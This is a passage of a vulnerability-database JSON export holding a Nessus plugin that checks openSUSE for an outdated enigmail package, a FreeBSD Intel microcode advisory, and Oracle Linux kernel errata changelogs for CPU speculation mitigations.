"bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "924361c4dc424b356a38cd5a5e0408de", "key": "description"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2019-10-28T20:48:23", "modified": "2019-10-02T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": 
"2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "This script is Copyright (C) 2017 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified"], "edition": 4, "lastseen": "2019-10-28T20:48:23"}], "edition": 5, "hashmap": [{"key": 
"bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "3534a67c2a45e8693917a1aa029c2c8a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "924361c4dc424b356a38cd5a5e0408de"}, {"key": "href", "hash": "58e6fa5c9fa960c7b16faef32456c3e2"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "c36d97390a7f025c98d5b1a13740d009"}, {"key": "published", "hash": "3487ad13e00e4e90d860294ed8b233be"}, {"key": "references", "hash": "3c82f25bf837b29ecb737f895c32996b"}, {"key": "reporter", "hash": "7e4308681efd8978171e2f0d2dab8b79"}, {"key": "sourceData", "hash": "dcd374620f55089e90475444843870c7"}, {"key": "title", "hash": "29f203d0c2ab07cf580e42855d9987f8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7118fc8d83cbd809d2a03090e452bb222aeca65eedfe2069483d0c2a1ac9550f", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "oraclelinux", "idList": ["ELSA-2019-4702", "ELSA-2019-4713", "ELSA-2018-3041"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2019-4713.NASL", "DEBIAN_DSA-4469.NASL", "EULEROS_SA-2019-1588.NASL", "EULEROS_SA-2019-1586.NASL", "REDHAT-RHSA-2019-1190.NASL", "EULEROS_SA-2019-1411.NASL", "REDHAT-RHSA-2019-1170.NASL", "SUSE_SU-2016-2898-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704469", "OPENVAS:1361412562310876390"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4469-1:B9B08"]}, {"type": "mskb", "idList": ["KB4494441"]}, {"type": "redhat", "idList": ["RHSA-2019:1190", "RHSA-2019:1170"]}, {"type": "threatpost", "idList": ["THREATPOST:CBFAA2319AF4281EC1DD5C4682601942"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC"]}], "modified": "2019-11-01T03:01:30"}, "score": {"value": 1.2, "vector": "NONE", "modified": 
"2019-11-01T03:01:30"}, "vulnersScore": 1.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "105452", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "scheme": null}
{"freebsd": [{"lastseen": "2019-11-26T01:24:12", "bulletinFamily": "unix", "description": "\nStarting with version 1.26, the devcpu-data port/package includes\n\tupdates and mitigations for the following technical and security\n\tadvisories (depending on CPU model).\nIntel TSX Updates (TAA) CVE-2019-11135 Voltage Modulation\n\tVulnerability CVE-2019-11139 MD_CLEAR Operations\n\tCVE-2018-12126 CVE-2018-12127 CVE-2018-12130 CVE-2018-11091\n\tTA Indirect Sharing CVE-2017-5715 EGETKEY CVE-2018-12126\n\tCVE-2018-12127 CVE-2018-12130 CVE-2018-11091 JCC SKX102\n\t Erratum \nUpdated microcode includes mitigations for\n\tCPU issues, but may also cause a performance regression due\n\tto the JCC erratum mitigation. Please visit\n\thttp://www.intel.com/benchmarks for further information.\n\t\nPlease visit http://www.intel.com/security for\n\tdetailed information on these advisories as well as a list of\n\tCPUs that are affected.\nOperating a CPU without the latest microcode may result in erratic or\n\tunpredictable behavior, including system crashes and lock ups.\n\tCertain issues listed in this advisory may result in the leakage of\n\tprivileged system information to unprivileged users. 
Please refer to\n\tthe security advisories listed above for detailed information.\n", "modified": "2019-11-14T00:00:00", "published": "2019-11-14T00:00:00", "id": "FBE10A8A-05A1-11EA-9DFA-F8B156AC3FF9", "href": "https://vuxml.freebsd.org/freebsd/fbe10a8a-05a1-11ea-9dfa-f8b156ac3ff9.html", "title": "FreeBSD -- Intel CPU Microcode Update", "type": "freebsd", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-08-04T23:47:08", "bulletinFamily": "unix", "description": "kernel\n- 2.6.18-419.0.0.0.13\n- x86/speculation/mds: Conditionally clear CPU buffers on idle entry (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Call VERW on NMI path when returning to user (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Fix verw usage to use memory operand (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Make cpu_matches() __cpuinit (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation mode VMWERV (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add sysfs reporting for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation control for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Improve coverage for MDS vulnerability (Boris Ostrovsky) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Clear CPU buffers on exit to user (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} 
{CVE-2019-11091} \n- x86/speculation/mds: Add mds_clear_cpu_buffers() (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add BUG_MSBDS_ONLY (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add basic bug infrastructure for MDS (Andi Kleen) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation: Consolidate CPU whitelists (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- 2.6.18-419.0.0.0.12\n- [x86] mm/dump_pagetables: Add a check_l1tf debugfs file (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Make flush_l1d visible in /proc/cpuinfo (Chris von Recklinghausen) [1593378]\n- [x86] cpufeatures: Add detection of L1D cache flush support. (Chris von Recklinghausen) [1593378]\n- [x86] l1tf: protect _PAGE_FILE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Extend 64bit swap file size limit (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Move the l1tf function and define pr_fmt properly (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Limit swap file size to MAX_PA/2 (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Add sysfs reporting for l1tf (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect PROT_NONE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect swap entries against L1TF (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Change order of offset/type in swap entry (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Increase 32bit PAE __PHYSICAL_PAGE_SHIFT (Chris von Recklinghausen) [1593378] 
{CVE-2018-3620}\n- [x86] cpu: Fix incorrect vulnerabilities files function prototypes (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Export the internal __cpu_bugs variable (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] spec_ctrl: sync with upstream cpu_set_bug_bits() (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] intel-family.h: Add GEMINI_LAKE SOC (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Fix swap entry comment and macro (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Move swap offset/type up in PTE to work around erratum (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpufeatures: Resolve X86_FEATURE_SMEP definition conflict (Radomir Vrbovsky) [1570474]\n- [x86] fix kexec load warnings with PTI enabled (Rafael Aquini) [1576191]\n- [x86] ia32entry: make target ia32_ret_from_sys_call the common exit point to long-mode (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [x86] spec_ctrl: only perform RSB stuffing on SMEP capable CPUs (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [net] tcp: fix 0 divide in __tcp_select_window (Davide Caratti) [1488343] {CVE-2017-14106}\n- [net] tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Davide Caratti) [1488343] {CVE-2017-14106}\n- [x86] adjust / fix LDT handling for PTI (Rafael Aquini) [1584622]\n- [x86] Fix up /proc/cpuinfo entries (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] spec_ctrl: work around broken microcode (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] Only expose PR_{GET, SET}_SPECULATION_CTRL if CONFIG_SPEC_CTRL is defined (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] misc changes to fix i386 builds (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] amd: Disable AMD SSBD mitigation in a VM (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: add support for SSBD to RHEL IBRS entry/exit macros (Chris von Recklinghausen) [1566896] 
{CVE-2018-3639}\n- [x86] bugs: Rename _RDS to _SSBD (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] speculation: Add prctl for Speculative Store Bypass mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] process: Allow runtime control of Speculative Store Bypass (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] 64: add skeletonized version of __switch_to_xtra (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] prctl: Add speculation control prctls (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs/AMD: Add support to disable RDS on Fam[15, 16, 17]h if requested (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Sync up RDS setting with IBRS code (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Provide boot parameters for the spec_store_bypass_disable mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Expose the /sys/../spec_store_bypass and X86_BUG_SPEC_STORE_BYPASS (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] include: add latest intel-family.h from RHEL6 (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Read SPEC_CTRL MSR during boot and re-use reserved bits (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Use separate PCP variables for IBRS entry and exit (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpuid: Fix up IBRS/IBPB/STIBP feature bits on Intel (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Clean up Spectre v2 related CPUID flags (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add AMD feature bits for Speculation Control (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add Intel feature bits for Speculation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpu: Add driver auto probing for x86 features (Chris von Recklinghausen) [1566896] 
{CVE-2018-3639}\n- 2.6.18-419.0.0.0.11\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}\n- 2.6.18-419.0.0.0.10\n- Backport CVE-2017-5715 to RHCK/OL5 [orabug 27787723]\n- 2.6.18-419.0.0.0.9\n- rebuild with retpoline compiler\n- 2.6.18-419.0.0.0.8\n- Backport CVEs to RHCK/OL5 [orabug 27547712] {CVE-2017-5753} {CVE-2017-5754}\n- 2.6.18-419.0.0.0.5\n- [fs] fix kernel panic on boot on ia64 guests (Honglei Wang) [orabug 26934100]\n- 2.6.18-419.0.0.0.4\n- [fs] fix bug in loading of PIE binaries (Michael Davidson) [orabug 26916951] {CVE-2017-1000253}\n- 2.6.18-419.0.0.0.3\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [orabug 26586706] {CVE-2017-7895}", "modified": "2019-08-04T00:00:00", "published": "2019-08-04T00:00:00", "id": "ELSA-2019-4702", "href": "http://linux.oracle.com/errata/ELSA-2019-4702.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-04T23:45:10", "bulletinFamily": "unix", "description": "kernel\n- 2.6.18-419.0.0.0.14\n- x86/speculation/mds: Conditionally clear CPU buffers on idle entry (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Call VERW on NMI path when returning to user (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Fix verw usage to use memory operand (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Make cpu_matches() __cpuinit (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation mode VMWERV (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add sysfs reporting for MDS (Thomas Gleixner) [orabug 
29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation control for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Improve coverage for MDS vulnerability (Boris Ostrovsky) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Clear CPU buffers on exit to user (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091} \n- x86/speculation/mds: Add mds_clear_cpu_buffers() (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add BUG_MSBDS_ONLY (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add basic bug infrastructure for MDS (Andi Kleen) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Consolidate CPU whitelists (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- 2.6.18-419.0.0.0.12\n- [x86] mm/dump_pagetables: Add a check_l1tf debugfs file (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Make flush_l1d visible in /proc/cpuinfo (Chris von Recklinghausen) [1593378]\n- [x86] cpufeatures: Add detection of L1D cache flush support. 
(Chris von Recklinghausen) [1593378]\n- [x86] l1tf: protect _PAGE_FILE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Extend 64bit swap file size limit (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Move the l1tf function and define pr_fmt properly (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Limit swap file size to MAX_PA/2 (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Add sysfs reporting for l1tf (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect PROT_NONE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect swap entries against L1TF (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Change order of offset/type in swap entry (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Increase 32bit PAE __PHYSICAL_PAGE_SHIFT (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Fix incorrect vulnerabilities files function prototypes (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Export the internal __cpu_bugs variable (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] spec_ctrl: sync with upstream cpu_set_bug_bits() (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] intel-family.h: Add GEMINI_LAKE SOC (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Fix swap entry comment and macro (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Move swap offset/type up in PTE to work around erratum (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpufeatures: Resolve X86_FEATURE_SMEP definition conflict (Radomir Vrbovsky) [1570474]\n- [x86] fix kexec load warnings with PTI enabled (Rafael Aquini) [1576191]\n- [x86] ia32entry: make target ia32_ret_from_sys_call the common exit point to 
long-mode (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [x86] spec_ctrl: only perform RSB stuffing on SMEP capable CPUs (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [net] tcp: fix 0 divide in __tcp_select_window (Davide Caratti) [1488343] {CVE-2017-14106}\n- [net] tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Davide Caratti) [1488343] {CVE-2017-14106}\n- [x86] adjust / fix LDT handling for PTI (Rafael Aquini) [1584622]\n- [x86] Fix up /proc/cpuinfo entries (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] spec_ctrl: work around broken microcode (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] Only expose PR_{GET, SET}_SPECULATION_CTRL if CONFIG_SPEC_CTRL is defined (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] misc changes to fix i386 builds (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] amd: Disable AMD SSBD mitigation in a VM (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: add support for SSBD to RHEL IBRS entry/exit macros (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Rename _RDS to _SSBD (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] speculation: Add prctl for Speculative Store Bypass mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] process: Allow runtime control of Speculative Store Bypass (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] 64: add skeletonized version of __switch_to_xtra (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] prctl: Add speculation control prctls (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs/AMD: Add support to disable RDS on Fam[15, 16, 17]h if requested (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Sync up RDS setting with IBRS code (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Provide boot parameters for the spec_store_bypass_disable mitigation (Chris von Recklinghausen) [1566896] 
